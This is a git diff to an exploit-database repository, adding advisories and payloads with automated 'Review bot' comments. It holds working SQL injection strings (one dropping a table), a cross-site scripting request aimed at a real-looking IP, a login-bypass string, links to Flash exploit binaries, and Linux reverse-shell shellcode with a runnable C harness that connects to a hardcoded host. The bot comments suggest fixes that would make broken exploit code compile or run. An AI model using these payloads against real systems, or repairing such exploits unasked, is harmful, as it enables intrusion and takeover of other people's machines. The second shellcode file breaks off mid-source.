diff --git a/exploits/asp/webapps/44739.txt b/exploits/asp/webapps/44739.txt
new file mode 100644
index 000000000..353e6bf3e
--- /dev/null
+++ b/exploits/asp/webapps/44739.txt
@@ -0,0 +1,52 @@
+# Exploit Title: ASP.NET jVideo Kit - 'query' SQL Injection
+# Dork: N/A
+# Date: 23.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor: MediaSoft Pro
+# Vendor Homepage: https://www.mediasoftpro.com/video-sharing-script/mvc/
+# Version: v1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The vulnerability allows an attacker to inject sql commands
+from the search section with 'query' parameter. You can use the GET or POST
+methods.
+====================================================
+
+# PoC : SQLi :
+
+# GET : http://test.com/search?query=[SQL]
+# POST : http://test.com/search
+POST /search HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://test.com/login
+Cookie: ASP.NET_SessionId=wxim4xkwgxvhtu5k3pvevc3o;
+__RequestVerificationToken=iuu_Y6Xm3aOzaKj3EfCyE_-eT-Ff_lRdBMBZzyFRszSTGdNcaY2w5pH7ck0WZ2egIX3R18UlpXkr8pe_kxw6Ic2g1M-Cmz4woLsU6RRMV3M1
+
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 10
+Query=test
+
+
+# Vulnerable Payload :
+
+Parameter: query (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: query=test%' AND 3923=3923 AND '%'='
+
+ Type: error-based
+ Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
+clause (IN)
+ Payload: query=test%' AND 1603 IN (SELECT
+(CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN
+(1603=1603) THEN CHAR(49) ELSE CHAR(48)
+END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND '%'='
+
+
+====================================================
\ No newline at end of file
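Review bot: The POST PoC's header block is not a well-formed request as printed: the wrapped `__RequestVerificationToken=…` cookie value is followed by an empty line, and an empty line terminates HTTP headers, so `Connection`, `Content-Type` and `Content-Length` would be read as body. This looks like a line-wrap artifact of the long token rather than intent; rejoining the Cookie value onto one line and dropping the empty line restores the request the author evidently meant. The advisory also records no fix status or vendor response for v1.0, which a reader triaging the product would want next to the `# Version:` line.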
diff --git a/exploits/java/webapps/44747.txt b/exploits/java/webapps/44747.txt
new file mode 100644
index 000000000..82e96751d
--- /dev/null
+++ b/exploits/java/webapps/44747.txt
@@ -0,0 +1,22 @@
+# Exploit Title: OpenDaylight SQL Injection
+# Date: 2018-05-24
+# Exploit Author: JameelNabbo
+# Website: jameelnabbo.com
+# Vendor Homepage: https://www.opendaylight.org
+# CVE: CVE-2018-1132
+
+
+intro:
+OpenDaylight (ODL) is a modular open platform for customizing and automating networks of any size and scale. The OpenDaylight Project arose out of the SDN movement, with a clear focus on network programmability. It was designed from the outset as a foundation for commercial solutions that address a variety of use cases in existing network environments.
+
+attackers can SQL inject the component's database(SQLite) without authenticating to the controller or SDNInterfaceapp.
+
+The bug is in /impl/src/main/java/org/opendaylight/sdninterfaceapp/impl/database/SdniDataBase.java (line 373~391)
+
+The SDNI concats port information to build an insert SQL query, and it executes the query in SQLite.
+However, in line 386, the portName is a string that can be customized by switches. Since SQLite supports multiple sql queries in one run,
+attackers can customize the port name to inject another SQL if they compromise or forge a switch.
+
+POC:
+For example, he can set portName as:
+");drop table NAME;//
\ No newline at end of file
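Review bot: The advisory never states which OpenDaylight / SDNInterfaceapp releases are affected or in which release CVE-2018-1132 was fixed, so a reader cannot tell whether a deployed controller is in scope; the other entries in this commit carry a `# Version:` header. Suggest adding `# Version: [affected-release-placeholder]` and, once known, a line naming the fixed release. The quoted source path under `/impl/src/main/java/org/opendaylight/sdninterfaceapp/` is presumably relative to the SDNInterfaceapp component rather than the controller repository, which is worth saying explicitly since the title names OpenDaylight as a whole.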
diff --git a/exploits/linux/local/44750.txt b/exploits/linux/local/44750.txt
new file mode 100644
index 000000000..4e90ed59a
--- /dev/null
+++ b/exploits/linux/local/44750.txt
@@ -0,0 +1,36 @@
+# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
+# Date: 2018-05-24
+# Exploit Author: JameelNabbo
+# Website: jameelnabbo.com
+# Vendor Homepage: http://www.gnu.org/
+# CVE: CVE-2018-11237
+
+
+# POC:
+
+$ cat mempcpy.c
+#define _GNU_SOURCE 1
+#include
+#include
+
+#define N 97699
+char a[N];
+char b[N+128];
+
+int
+main (void)
+{
+ memset (a, 'x', N);
+ char *c = mempcpy (b, a, N);
+ assert (*c == 0);
+}
+$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
+$ ./mempcpy
+mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.
+
+The problem is these two lines in memmove-avx512-no-vzeroupper.S:
+
+ vmovups %zmm4, (%rax)
+ vmovups %zmm5, 0x40(%rax)
+
+For mempcpy, %rax points to the end of the buffer.
\ No newline at end of file
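Review bot: The two `#include` directives in the PoC carry no header name, so `mempcpy.c` does not build as printed; given `_GNU_SOURCE` on the first line and the calls used (`memset`, `mempcpy`, `assert`), these should read `#include <string.h>` and `#include <assert.h>`. The title's `< 2.27` range also looks narrower than the CVE: as I recall the CVE-2018-11237 text covers glibc 2.27 and earlier, so a 2.27 system would be in scope — worth verifying before the title is indexed. Naming the release that carries the fix next to the root-cause note on `memmove-avx512-no-vzeroupper.S` would complete the picture for anyone assessing exposure.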
diff --git a/exploits/linux/webapps/44749.txt b/exploits/linux/webapps/44749.txt
new file mode 100644
index 000000000..6ee6406dd
--- /dev/null
+++ b/exploits/linux/webapps/44749.txt
@@ -0,0 +1,57 @@
+# Exploit Title: Honeywell XL Web Controller - Cross-Site Scripting
+# Date: 2018-05-24
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: https://www.honeywell.com
+# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB
+# 104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O,
+# XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL,
+# XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.
+# Tested on: Linux
+# CVE: CVE-2014-3110
+
+# PoC
+
+POST /standard/mainframe.php HTTP/1.1
+Cache-Control: no-cache
+Referer: http://79.2.122.25/standard/mainframe.php
+Accept: text/xml,application/xml,application/xhtml+xml,text/
+html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/41.0.2272.16 Safari/537.36
+Accept-Language: en-us,en;q=0.5
+Cookie: Locale=1033
+Accept-Encoding: gzip, deflate
+Content-Length: 222
+Content-Type: application/x-www-form-urlencoded
+
+SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/>
+&LoginPasswordMD5=&LoginCommand=&LoginPassword=&
+rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest
+
+HTTP/1.1 200 OK
+Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02
+GMT; path=/
+Server: Apache/1.3.23 (Unix) PHP/4.4.9
+X-Powered-By: PHP/4.4.9
+Content-Type: text/html
+Transfer-Encoding: chunked
+Date: Thu, 24 May 2018 08:54:03 GMT
+
+
+Warning : xw_get_users() expects parameter 1 to be long, string
+given in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line
+97
+
+Warning : xml_load_texts_file() expects parameter 2 to be long,
+string given in /mnt/mtd6/xlweb/web/standard/include/elements.php on
+line 247
+
+
+
+
+
+
+Notice : Undefined index: HeadTitle in /mnt/mtd6/xlweb/web/
+standard/login/loginpage.php on line 300
+
\ No newline at end of file
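Review bot: The response excerpt shows only PHP warnings and notices from `loginpage.php` and `elements.php`; the reflection of the `"/>` fragment submitted in `LoginUserNameMD5`, which is what would actually demonstrate cross-site scripting, is not visible, so either it was stripped when the markup was rendered or the evidence is missing from the write-up. The Referer line also uses what appears to be a routable address (`79.2.122.25`) while the other advisories in this commit use `test.com`/`Target` placeholders; a placeholder keeps the PoC consistent and avoids pointing at a real host. The `# Version:` header lists product models but no firmware or web version, which a reader mapping CVE-2014-3110 to an installed unit would need.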
diff --git a/exploits/linux/webapps/44751.txt b/exploits/linux/webapps/44751.txt
new file mode 100644
index 000000000..063407253
--- /dev/null
+++ b/exploits/linux/webapps/44751.txt
@@ -0,0 +1,12 @@
+# Exploit Title: EU MRV Regulatory Complete Solution 1 - Authentication Bypass
+# Date: 2018-05-24
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codecanyon.net/item/eu-mrv-regulatory-complete-solution/21680923?s_rank=11
+# Version: v1 (REQUIRED)
+# Tested on: Windows
+
+http://Target/projects/eumrv/app/#/access/signin
+
+username: '=''or'
+
+Password: '=''or'
\ No newline at end of file
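Review bot: The `# Version: v1 (REQUIRED)` header still carries the submission template's `(REQUIRED)` marker, and `# Tested on: Windows` sits oddly with the entry being indexed under `linux/webapps`; one of the two should be reconciled. `# Version: 1` would match the title used in the index row for this entry.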
diff --git a/exploits/php/webapps/44735.txt b/exploits/php/webapps/44735.txt
deleted file mode 100644
index 3ebb2e152..000000000
--- a/exploits/php/webapps/44735.txt
+++ /dev/null
@@ -1,121 +0,0 @@
-# Title: NewsBee CMS 1.4 - Cross-Site Request Forgery
-# Author: indoushka
-# Tested on: windows 10 Français V.(Pro)
-# Vendor: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
-# Dork: N/A
-
-# PoC
-
-
-
-
\ No newline at end of file
diff --git a/exploits/php/webapps/44746.txt b/exploits/php/webapps/44746.txt
new file mode 100644
index 000000000..e0ad52753
--- /dev/null
+++ b/exploits/php/webapps/44746.txt
@@ -0,0 +1,44 @@
+# Exploit Title: PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting
+# Dork: N/A
+# Date: 23.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor: MediaSoft Pro
+# Vendor Homepage: https://codecanyon.net/item/paulnews-newspaper-and-magazine-script/19260686
+# Version: v1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The vulnerability allows an attacker to inject sql commands
+from the search section with 'keyword' parameter. You can use the GET or
+POST methods.
+====================================================
+
+# PoC : SQLi :
+
+http://test.com/news/search?keyword=[SQL]
+
+# Vulnerable Payload :
+
+Parameter: query (GET)
+ Type : boolean-based blind
+ Demo : http://test.com/news/search?keyword=test
+ Payload: keyword=-3431') OR 6871=6871#
+
+ Type : error-based
+ Demo : http://test.com/news/search?keyword=test
+ Payload: keyword=test') OR (SELECT 8996 FROM(SELECT
+COUNT(*),CONCAT(0x71626b6271,(SELECT
+(ELT(8996=8996,1))),0x71766b7671,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsdG
+
+ Type : AND/OR time-based blind
+ Demo : http://test.com/news/search?keyword=test
+ Payload: keyword=test') OR SLEEP(5)-- OEdN
+
+
+====================================================
+
+# PoC : XSS :
+
+ Payload :
+http://test.com/news/search?keyword=%27%20%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E%E2%80%98
+;
\ No newline at end of file
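Review bot: The Vulnerable Payload section opens with `Parameter: query (GET)` while the title, the description and the payloads themselves all name the parameter `keyword`; change it to `Parameter: keyword (GET)`. The `# Vendor: MediaSoft Pro` line looks copied from the jVideo Kit advisory in the same commit, since the vendor homepage given here is a CodeCanyon listing for PaulNews — worth checking against the item page. As with the sibling advisory, no fix status or vendor contact date is recorded.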
diff --git a/exploits/php/webapps/44748.html b/exploits/php/webapps/44748.html
new file mode 100644
index 000000000..68226d2c9
--- /dev/null
+++ b/exploits/php/webapps/44748.html
@@ -0,0 +1,42 @@
+# Exploit Title: Timber - Ultimate Freelancer Platform 1.1 - Cross site request forgery
+# Date: 2018-05-24
+# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
+# Vendor Homepage:
+https://codecanyon.net/item/timber-ultimate-freelancer-platform/14747284?s_rank=1717
+# Version: 1.1
+# Tested on: Kali linux
+=========================================
+
+# POC :
+
+
+
+ CSRF POC
+
+
+
+
+
+
+
+==========================================
\ No newline at end of file
diff --git a/exploits/windows/local/44741.html b/exploits/windows/local/44741.html
new file mode 100644
index 000000000..1beeb7ea9
--- /dev/null
+++ b/exploits/windows/local/44741.html
@@ -0,0 +1,353 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/44742.txt b/exploits/windows/local/44742.txt
new file mode 100644
index 000000000..99a5019da
--- /dev/null
+++ b/exploits/windows/local/44742.txt
@@ -0,0 +1,5 @@
+## CVE-2015-5112
+
+Pop up a calculator - Requires Flash ActiveX 18.0.0.194
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44742.swf
\ No newline at end of file
diff --git a/exploits/windows/local/44743.html b/exploits/windows/local/44743.html
new file mode 100644
index 000000000..7dd9f9771
--- /dev/null
+++ b/exploits/windows/local/44743.html
@@ -0,0 +1,267 @@
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/local/44744.txt b/exploits/windows/local/44744.txt
new file mode 100644
index 000000000..7327d0376
--- /dev/null
+++ b/exploits/windows/local/44744.txt
@@ -0,0 +1,5 @@
+## CVE-2018-4878 (flash exploit)
+
+Pop up a calculator - tested with installation of flash activeX plugin 28.0.0.137
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44744.xlsx
\ No newline at end of file
diff --git a/exploits/windows/local/44745.txt b/exploits/windows/local/44745.txt
new file mode 100644
index 000000000..3d5a4befa
--- /dev/null
+++ b/exploits/windows/local/44745.txt
@@ -0,0 +1,5 @@
+## CVE-2018-4878
+
+Pop up a calculator - Requires Flash ActiveX 28.0.0.137
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44745.swf
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a036a2a4d..18ee79f26 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9725,7 +9725,7 @@ id,file,description,date,author,type,platform,port
44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware,
44649,exploits/windows/local/44649.py,"Prime95 29.4b8 - Stack Buffer Overflow (SEH)",2018-05-18,crash_manucoot,local,windows,
-44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
+44652,exploits/linux/local/44652.py,"DynoRoot DHCP Client - Command Injection",2018-05-18,"Kevin Kirsche",local,linux,
44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux,
44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux,
@@ -9735,6 +9735,12 @@ id,file,description,date,author,type,platform,port
44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows,
+44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows,
+44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows,
+44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows,
+44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows,
+44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows,
+44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
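Review bot: The new rows for 44744 and 44745 are dated 2016-02-16 and 2016-02-13, yet both files are titled CVE-2018-4878, a CVE allocated in 2018, so the year looks like a typo for 2018 (the sibling 44742 row uses 2018-02-13); worth confirming against the submissions before the index is published. The 44743 row's 2016-02-01 date may be correct for a Check Point write-up but is in the same cluster, so it deserves the same check.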
@@ -39410,6 +39416,11 @@ id,file,description,date,author,type,platform,port
44732,exploits/php/webapps/44732.txt,"eWallet Online Payment Gateway 2 - Cross-Site Request Forgery",2018-05-23,L0RD,webapps,php,
44733,exploits/php/webapps/44733.txt,"Mcard Mobile Card Selling Platform 1 - SQL Injection",2018-05-23,L0RD,webapps,php,
44734,exploits/linux/webapps/44734.txt,"Honeywell Scada System - Information Disclosure",2018-05-23,t4rkd3vilz,webapps,linux,
-44735,exploits/php/webapps/44735.txt,"NewsBee CMS 1.4 - Cross-Site Request Forgery",2018-05-23,indoushka,webapps,php,
44736,exploits/hardware/webapps/44736.txt,"SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change",2018-05-23,"Safak Aslan",webapps,hardware,
44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php,
+44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp,
+44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,
+44747,exploits/java/webapps/44747.txt,"OpenDaylight - SQL Injection",2018-05-24,JameelNabbo,webapps,java,
+44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php,
+44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux,
+44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux,
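Review bot: The rows for 44739 and 44746 carry 2018-05-24, but the corresponding files' headers read `# Date: 23.05.2018`; one of the two should be corrected so the index and the advisory agree. The other new rows in this hunk (44747, 44748, 44749, 44751) match their files' `# Date:` lines.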
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 04c7bf3cf..d58ba033f 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -885,3 +885,5 @@ id,file,description,date,author,type,platform
44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86
44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86
+44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
+44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44738.c b/shellcodes/linux_x86/44738.c
new file mode 100644
index 000000000..bdfd5bfd0
--- /dev/null
+++ b/shellcodes/linux_x86/44738.c
@@ -0,0 +1,70 @@
+/*
+; Title : Linux/x86 - Reverse TCP Shell Shellcode (68 bytes)
+; Date : May, 2018
+; Author : Nuno Freitas
+; Blog Post : https://bufferoverflowed.wordpress.com
+; Twitter : @nunof11
+; SLAE ID : SLAE-1112
+; Size : 68 bytes
+; Tested on : i686 GNU/Linux
+
+section .text
+
+global _start
+
+_start:
+ xor ecx, ecx
+ mul ecx
+
+ mov al, 0x66
+ push ebx
+ inc ebx
+ push ebx
+ push 0x2
+ mov ecx, esp
+ int 0x80
+
+ pop ecx
+ xchg eax, ebx
+loop:
+ mov al, 0x3f
+ int 0x80
+ dec ecx
+ jns loop
+
+ mov al, 0x66
+ dec ebx
+ push 0x04020a0a ; IP
+ push word 0x5c11 ; Port
+ push bx
+ mov ecx,esp
+ push 0x10
+ push ecx
+ inc ebx
+ push ebx
+ mov ecx,esp
+ int 0x80
+
+ mov al, 0x0b
+ xor ecx, ecx
+ push ecx
+ push dword 0x68732f2f
+ push dword 0x6e69622f
+ mov ebx, esp
+ int 0x80
+
+*/
+
+#include
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc9\xf7\xe1\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x59\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x4b\x68\x0a\x0a\x02\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x43\x53\x89\xe1\xcd\x80\xb0\x0b\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+
+void main()
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
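Review bot: The two `#include` lines name no header, so the harness does not compile as committed; the only library names it uses are `printf` and `strlen`, i.e. `#include <stdio.h>` and `#include <string.h>`. `printf("Shellcode Length: %d\n", strlen(shellcode))` passes a `size_t` to `%d`; `%zu` is the matching conversion, and `void main()` is not a conforming signature — `int main(void)` is. For consistency with 44740.c in the same commit, the header comment could also record the assemble/link and compile commands the author used, since readers otherwise have to guess them.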
diff --git a/shellcodes/linux_x86/44740.c b/shellcodes/linux_x86/44740.c
new file mode 100644
index 000000000..425363905
--- /dev/null
+++ b/shellcodes/linux_x86/44740.c
@@ -0,0 +1,324 @@
+/* Name : Jonathan "Chops" Crosby
+ * Email : me@securitychops.com
+ * Twitter : @securitychops
+ * Website : https://securitychops.com
+ * Blog Post : https://securitychops.com/2018/05/21/slae-assignment-2-reverse-shell-tcp-shellcode.html
+ * Student ID : SLAE-1250
+ * Assignment 2 : Reverse Shell TCP (Linux/x86)
+ * Shellcode Length : 101 bytes
+ * Shellcode Purpose: Initiate a reverse shell back to the ip address / port number on shellcode execution
+ *
+ * Assembly code to generate shellcode in provided C program:
+
+; assemble/link assembly with:
+; nasm -f elf32 -o shellcode.o shellcode.nasm
+; ld -o shellcode shellcode.o
+
+global _start
+
+section .text
+_start:
+
+; for all socket based calls we will need to use socketcall
+; http://man7.org/linux/man-pages/man2/socketcall.2.html
+;
+; the relevant calls we will need to make will be:
+; -----
+; SYS_SOCKET socket(2) 0x01
+; SYS_BIND bind(2) 0x02
+; SYS_CONNECT connect(2) 0x03
+; SYS_LISTEN listen(2) 0x04
+; SYS_ACCEPT accept(2) 0x05
+; -----
+; due to the way the registers need to be loaded up we will need to
+; make the call to cocketcall by loading the following info into
+; the following registers
+; -----
+; eax : 0x66 (this is the value of socketcall)
+; ebx : SYS_* value (0x01, etc)
+; ecx : pointer to address on stack of parameters to subfunction
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+; C version : int socket(domain, type , protocol)
+; ASM version: socketcall(SYS_SOCKET, socket(AF_INET,SOCK_STREAM,IPPROTO_IP))
+; Returns : socketid into eax
+; -----
+; Param Values:
+; #define AF_INET 2 // Internet IP Protocol
+; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html
+;
+; #define SOCK_STREAM 1 // stream (connection) socket
+; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html
+;
+; #define IPPROTO_IP 0
+; If the protocol argument is zero, the default protocol for this address family and type shall be used.
+; http://pubs.opengroup.org/onlinepubs/009695399/functions/socket.html
+; -----
+; Registers before calling socketcall:
+;
+; /---eax---\ /---ebx---\ /--------ecx---------\
+; | 0x66 | | 0x01 | | byte, byte, byte |
+; \---------/ \---------/ | 0x02 0x01 0x00 |
+; \--------------------/
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+; push params to the stack last first
+
+xor eax, eax ; zeroing out edx to set IPPROTO_IP to 0
+push eax ; pushing IPPROTO_IP onto stack
+push byte 0x01 ; pushing SOCK_STREAM onto stack
+push byte 0x02 ; pushing AF_INET onto stack
+
+mov ecx, esp ; moving address of parameter structure into ecx
+
+xor eax, eax ; zeroing out eax
+mov al, 0x66 ; moving socketcall value into eax
+
+xor ebx, ebx ; zeroing out ebx
+mov bl, 0x01 ; moving SYS_SOCKET into ebx
+
+int 0x80 ; calling interupt which triggers socketcall
+
+; registers after calling socktcall
+
+; /----eax----\ /---ebx---\ /--------ecx---------\
+; | socketid | | 0x01 | | *address to struct |
+; \------------/ \---------/ \---------------------/
+
+; eax now contains our socketid, since eax is volitale
+; lets put it somewhere safe, like esi
+
+xchg eax, esi ; esi now contains our socketid
+ ; and eax contains whatever was in esi
+
+; /----eax----\ /---ebx---\ /--------ecx---------\ /---esi---\
+; | garbage | | 0x01 | | *address to struct | | socketid |
+; \------------/ \---------/ \---------------------/ \---------/
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+; C version : connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress));
+; ASM version: socketcall(SYS_CONNECT, connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress));
+; -----
+; Param Values:
+; socketid // currently stored in esi
+;
+; &serverAddress // memory on the stack for sockaddr
+; * http://pubs.opengroup.org/onlinepubs/7908799/xns/netinetin.h.html
+; * Values of this type must be cast to struct sockaddr for use with the socket interfaces
+;
+; this parameter is a struct of sockaddr_in which has the following structure
+;
+; struct sockaddr_in {
+; sa_family_t sin_family; // address family: AF_INET
+; in_port_t sin_port; // port in network byte order
+; struct in_addr sin_addr; // internet address
+; // Internet address.
+; struct in_addr {
+; uint32_t s_addr; // address in network byte order
+; };
+;
+; sa_family_t
+; #define AF_INET 2 // Internet IP Protocol
+; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html
+;
+; in_port_t // port in network byte order / big endian
+; https://en.wikipedia.org/wiki/Endianness
+; port 9876 would be: word 0x2694
+;
+; sin_addr // uint32_t ia 4 bytes
+; ip bound to will be XXX.XXX.XXX.XXX
+; ip would be: dword 0xFFFF or whatever IP will end up being reversed
+;
+; sizeof(serverAddress) // this value represents bytes, so 4 bytes is 32bits
+; the value here is 16 bytes or 0x10h which is ultimaly 32bits
+; -----
+;
+; Registers before calling socketcall:
+;
+; /---eax---\ /---ebx---\ /--------------------------ecx-----------------------------\
+; | 0x66 | | 0x03 | | socketid, mem of server address struct, size of struct |
+; \---------/ \---------/ | esi ecx 0x10 |
+; \-------------------------|--------------------------------/
+
+; we need to create the first stack pointer for sockaddr_in
+
+xor edx, edx
+
+push edx
+
+mov byte [esp] , 0x0a ; 10
+mov byte [esp+2], 0x07 ; 07
+mov byte [esp+3], 0x11 ; 17
+
+ ; mov byte [esp+1], 0x00 left out on purpose since
+ ; this would put 0x00 in the final shellcode, which
+ ; is generally considered bad practice since null
+ ; tends to cause issues when executing
+
+push word 0x5C11 ; port number (0x115C is 4444 so we push little endian)
+
+push word 0x02 ; AF_INET - which is 0x02
+
+mov ecx, esp ; move stack pointer to ecx
+
+push byte 0x10 ; 16 byts long (or 32bit)
+
+push ecx ; pushing sockaddr_in into esp
+
+push esi ; sockid already in esi, so pushing it
+
+mov ecx, esp ; moving stack pointer to ecx
+
+; from the previous call ebx is already 0x01
+; lets increment it by one
+inc ebx ; increasing ebx from 1 to 2
+inc ebx ; and from 2 to 3
+
+xor eax, eax ; zeroing out eax
+mov al, 0x66 ; moving socketcall value into eax
+
+int 0x80 ; calling interupt which triggers socketcall
+
+; registers after calling socktcall
+
+; /----eax----\ /---ebx---\ /--------ecx---------\ /---esi---\
